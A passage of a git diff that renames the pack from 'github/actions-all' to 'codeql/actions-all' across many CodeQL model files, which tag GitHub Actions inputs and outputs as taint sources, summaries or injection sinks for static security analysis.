index cd827ffc2f8..d20d698c40d 100644
--- a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
+++ b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
index 64abc03a5fb..f0e4e6e31b1 100644
--- a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
+++ b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"]
diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
index c14bc95c013..b15eff55336 100644
--- a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
+++ b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/AvraamMavridis/files-changed-action
diff --git a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
index 63eb8b21249..f17f3c788b3 100644
--- a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
+++ b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"]
diff --git a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
index 170ceb2f95c..ccdb64fd3f3 100644
--- a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
+++ b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/ql/lib/ext/manual/azure_cli.model.yml
index dcf1de044aa..588c17bc76a 100644
--- a/ql/lib/ext/manual/azure_cli.model.yml
+++ b/ql/lib/ext/manual/azure_cli.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml
index a2d08f93928..901c4cf461e 100644
--- a/ql/lib/ext/manual/azure_powershell.model.yml
+++ b/ql/lib/ext/manual/azure_powershell.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/bahmutov_npm-install.model.yml b/ql/lib/ext/manual/bahmutov_npm-install.model.yml
index 7d646dece69..8db78b6e9a8 100644
--- a/ql/lib/ext/manual/bahmutov_npm-install.model.yml
+++ b/ql/lib/ext/manual/bahmutov_npm-install.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
index fb03722c16a..20a06102bbd 100644
--- a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
+++ b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/bobheadxi_deployments.model.yml b/ql/lib/ext/manual/bobheadxi_deployments.model.yml
index a14748aead0..043610ab3a3 100644
--- a/ql/lib/ext/manual/bobheadxi_deployments.model.yml
+++ b/ql/lib/ext/manual/bobheadxi_deployments.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"]
diff --git a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
index 4caf23c8812..037b67993f3 100644
--- a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
+++ b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
index 1fa66b8ceb6..7483849b916 100644
--- a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
+++ b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
index f2fed75539b..8f5a15aa1e9 100644
--- a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
+++ b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
index 264c3f7b242..f18fd14a4a6 100644
--- a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
+++ b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/cachix_cachix-action.model.yml b/ql/lib/ext/manual/cachix_cachix-action.model.yml
index dfaffaf87de..f3eabe2c17d 100644
--- a/ql/lib/ext/manual/cachix_cachix-action.model.yml
+++ b/ql/lib/ext/manual/cachix_cachix-action.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/changesets_action.model.yml b/ql/lib/ext/manual/changesets_action.model.yml
index 7bab09bca76..e1b34c67d49 100644
--- a/ql/lib/ext/manual/changesets_action.model.yml
+++ b/ql/lib/ext/manual/changesets_action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["changesets/action", "*", "input.publish", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
index 86759ad40d5..9f212f145f6 100644
--- a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
+++ b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
index f00774d1c4a..49a39935544 100644
--- a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
+++ b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/coursier_cache-action.model.yml b/ql/lib/ext/manual/coursier_cache-action.model.yml
index 65474ba343d..319f712a9bf 100644
--- a/ql/lib/ext/manual/coursier_cache-action.model.yml
+++ b/ql/lib/ext/manual/coursier_cache-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"]
diff --git a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
index e3dd557084b..772a5d59e18 100644
--- a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
+++ b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
index f3cb32b612f..3d1366558fe 100644
--- a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
+++ b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/csexton_release-asset-action.model.yml b/ql/lib/ext/manual/csexton_release-asset-action.model.yml
index 639ee965f42..3da214d62fe 100644
--- a/ql/lib/ext/manual/csexton_release-asset-action.model.yml
+++ b/ql/lib/ext/manual/csexton_release-asset-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
index 40d03569c8d..37c6af1f99e 100644
--- a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
+++ b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/cypress-io_github-action.model.yml b/ql/lib/ext/manual/cypress-io_github-action.model.yml
index ed20a562375..fecc9e5ce05 100644
--- a/ql/lib/ext/manual/cypress-io_github-action.model.yml
+++ b/ql/lib/ext/manual/cypress-io_github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"]
diff --git a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
index 22725484ea4..34eac65cdc8 100644
--- a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
+++ b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"]
diff --git a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
index d7839211e20..ba5de3c2470 100644
--- a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
+++ b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
index 3ff92757361..27a8ffae185 100644
--- a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
+++ b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
index 2e41b4f8eb5..b87f1862999 100644
--- a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
+++ b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
index 62ff29bc9f0..7ead429278e 100644
--- a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
+++ b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"]
diff --git a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
index af4e15da03b..6b900caef36 100644
--- a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
+++ b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
index 2dbf4718714..cafdfada61b 100644
--- a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
+++ b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
index 412db371965..646d54ac92a 100644
--- a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
+++ b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
index 4bc7e251808..f316799fa4a 100644
--- a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
+++ b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/docker_build-push-action.model.yml b/ql/lib/ext/manual/docker_build-push-action.model.yml
index 845ae1770ed..116c231c30a 100644
--- a/ql/lib/ext/manual/docker_build-push-action.model.yml
+++ b/ql/lib/ext/manual/docker_build-push-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
index 226a151daba..a60f1cc9fb1 100644
--- a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
+++ b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"]
diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
index 8cdcabb2c11..eafb7d1fc3a 100644
--- a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
+++ b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"]
diff --git a/ql/lib/ext/manual/endbug_latest-tag.model.yml b/ql/lib/ext/manual/endbug_latest-tag.model.yml
index 780acdb98ff..b4aab55179b 100644
--- a/ql/lib/ext/manual/endbug_latest-tag.model.yml
+++ b/ql/lib/ext/manual/endbug_latest-tag.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/expo_expo-github-action.model.yml b/ql/lib/ext/manual/expo_expo-github-action.model.yml
index 038f1639d3c..3b7b4aea713 100644
--- a/ql/lib/ext/manual/expo_expo-github-action.model.yml
+++ b/ql/lib/ext/manual/expo_expo-github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
index d948bda8bf4..b09bec4a1d4 100644
--- a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
+++ b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/frabert_replace-string-action.model.yml b/ql/lib/ext/manual/frabert_replace-string-action.model.yml
index ed9eeb6b252..cb71f958365 100644
--- a/ql/lib/ext/manual/frabert_replace-string-action.model.yml
+++ b/ql/lib/ext/manual/frabert_replace-string-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"]
diff --git a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
index f6441133c7a..c4f8a3efe3e 100644
--- a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"]
diff --git a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
index 357ffc1c94a..aa9dd509661 100644
--- a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
+++ b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/game-ci_unity-builder.model.yml b/ql/lib/ext/manual/game-ci_unity-builder.model.yml
index 0288103fd0a..767c77310e8 100644
--- a/ql/lib/ext/manual/game-ci_unity-builder.model.yml
+++ b/ql/lib/ext/manual/game-ci_unity-builder.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
index 05dca2f8262..6df70ae927a 100644
--- a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
+++ b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
index 123dabe450e..3f43f195f68 100644
--- a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
+++ b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/getsentry_action-release.model.yml b/ql/lib/ext/manual/getsentry_action-release.model.yml
index cb127c7ff46..3c63d7b845f 100644
--- a/ql/lib/ext/manual/getsentry_action-release.model.yml
+++ b/ql/lib/ext/manual/getsentry_action-release.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"]
diff --git a/ql/lib/ext/manual/github_codeql-action.model.yml b/ql/lib/ext/manual/github_codeql-action.model.yml
index 79936a51520..6db033ebd9f 100644
--- a/ql/lib/ext/manual/github_codeql-action.model.yml
+++ b/ql/lib/ext/manual/github_codeql-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"]
diff --git a/ql/lib/ext/manual/go-semantic-release_action.model.yml b/ql/lib/ext/manual/go-semantic-release_action.model.yml
index 9bc26169b27..a376aefd6f6 100644
--- a/ql/lib/ext/manual/go-semantic-release_action.model.yml
+++ b/ql/lib/ext/manual/go-semantic-release_action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
index 8aa19f94452..51ca0af21c3 100644
--- a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
+++ b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
index dc86b19a69b..28d118e6b61 100644
--- a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
+++ b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
index bc9f2aad14c..7e045f8380a 100644
--- a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
+++ b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
index f288c615a35..2a6d3fac1df 100644
--- a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
+++ b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
diff --git a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
index c3604795c25..a3c590ec473 100644
--- a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
+++ b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
index dfcc204c2ba..98a61516c60 100644
--- a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
+++ b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"]
